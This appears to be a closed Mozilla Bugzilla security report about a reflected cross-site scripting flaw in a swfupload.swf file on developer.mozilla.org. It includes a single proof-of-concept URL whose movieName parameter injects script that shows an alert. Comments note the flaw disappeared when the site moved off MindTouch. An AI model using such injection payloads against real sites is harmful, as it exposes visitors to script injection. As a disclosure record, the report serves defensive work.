Closed
Bug 779954
Opened 13 years ago
Closed 13 years ago
Reflective XSS on https://developer.mozilla.org
Categories
(developer.mozilla.org Graveyard :: Wiki pages, defect)
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: christian.matthies, Unassigned)
Details
(Keywords: reporter-external, sec-moderate, wsec-xss, Whiteboard: [site:developer.mozilla.org][reporter-external])
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:14.0) Gecko/20100101 Firefox/14.0.1
Build ID: 20120713134347
Steps to reproduce:
There is a reflective XSS vulnerability on this site:
https://developer.mozilla.org/skins/common/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%27XSS%27%29}}//
Updated•13 years ago
Group: mozilla-services-security → websites-security
Status: UNCONFIRMED → NEW
Component: General → Website
Ever confirmed: true
Product: Mozilla Services → Mozilla Developer Network
Version: unspecified → MDN
Comment 2•13 years ago
Was this fixed by switching the backend from MediaWiki to Kuma (which happened this morning at last), or is swfupload.swf still buried in there somewhere?
Comment 3•13 years ago
By which I meant to say "I can't reproduce this". I get a 404 error.
Hm, the content is gone. It was there when I filed the bug...
Comment 5•13 years ago
yeah, a constant stream of bugs like this is one reason we switched.
Comment 6•13 years ago
we stopped using mindtouch for our developer site, well, right after you found this. :) there is a new site to attack!
Comment 7•13 years ago
bye bye MindTouch skins and your impossibly convoluted security vulnerabilities that you never bother to fix!
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Updated•13 years ago
Version: MDN → unspecified
Updated•13 years ago
Component: Website → Landing pages
Comment 8•12 years ago
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
Updated•12 years ago
Keywords: sec-moderate
Whiteboard: [site:developer.mozilla.org][reporter-external]
Comment 9•9 years ago
For bugs that are resolved, we remove the security flag. These haven't had their flag removed, so I'm removing it now.
Group: websites-security
Updated•5 years ago
Product: developer.mozilla.org → developer.mozilla.org Graveyard
Updated•1 year ago
Keywords: reporter-external